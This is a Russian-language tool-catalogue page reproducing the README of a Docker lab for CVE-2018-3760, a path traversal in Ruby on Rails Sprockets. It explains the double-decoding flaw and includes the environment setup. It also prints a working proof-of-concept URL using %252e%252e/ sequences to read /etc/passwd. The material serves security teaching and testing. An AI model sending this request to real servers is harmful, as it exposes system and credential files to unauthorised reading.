Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760- — Лаборатория на основе Docker, демонстрирующая обход пути CVE-2018-3760 в Ruby on Rails Sprockets, с POC и настройкой окружения для тестирования безопасности и обучения. | Kitploit
Инструменты/GitHubGitHub/cyberharsh/ruby-on-rails-path-traversal-vulnerability-cve-2018-3760-
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьОбучение и ОбразованиеЛаборатории и Практика
GitHubcyberharsh/ruby-on-rails-path-traversal-vulnerability-cve-2018-3760-

Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-

Лаборатория на основе Docker, демонстрирующая обход пути CVE-2018-3760 в Ruby on Rails Sprockets, с POC и настройкой окружения для тестирования безопасности и обучения.

Репозиторий
316 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уязвимость обхода пути в Ruby On Rails (CVE-2018-3760)

中文版本(Chinese version)

Ruby On Rails — известный Ruby-фреймворк для веб-разработки, который использует Sprockets в качестве статического файлового сервера в среде разработки. Sprockets — это библиотека Ruby, которая компилирует и распространяет статические ресурсы.

В Sprockets версии 3.7.1 и ниже существует уязвимость обхода пути, вызванная вторичным декодированием. Злоумышленник может использовать %252e%252e/ для доступа к корневому каталогу и чтения или выполнения любого файла на целевом сервере.

Ссылки:

  • https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
  • https://seclists.org/oss-sec/2018/q2/210
  • https://xz.aliyun.com/t/2542

Настройка окружения

Введите следующую команду:

root@kitploit:~
docker-compose up -d

Перейдите по адресу http://your-ip:3000, и вы увидите страницу приветствия.

POC

При прямом обращении к http://your-ip:3000/assets/file:%2f%2f/etc/passwd возникнет ошибка, так как файл /etc/passwd не находится в разрешённом каталоге.

Из страницы с ошибкой можно получить список разрешённых каталогов. Выберите один из них, например /usr/src/blog/app/assets/images, затем используйте %252e%252e/ для перехода в родительский каталог и в итоге прочитайте файл /etc/passwd:

root@kitploit:~
http://your-ip:3000/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

Скачать инструмент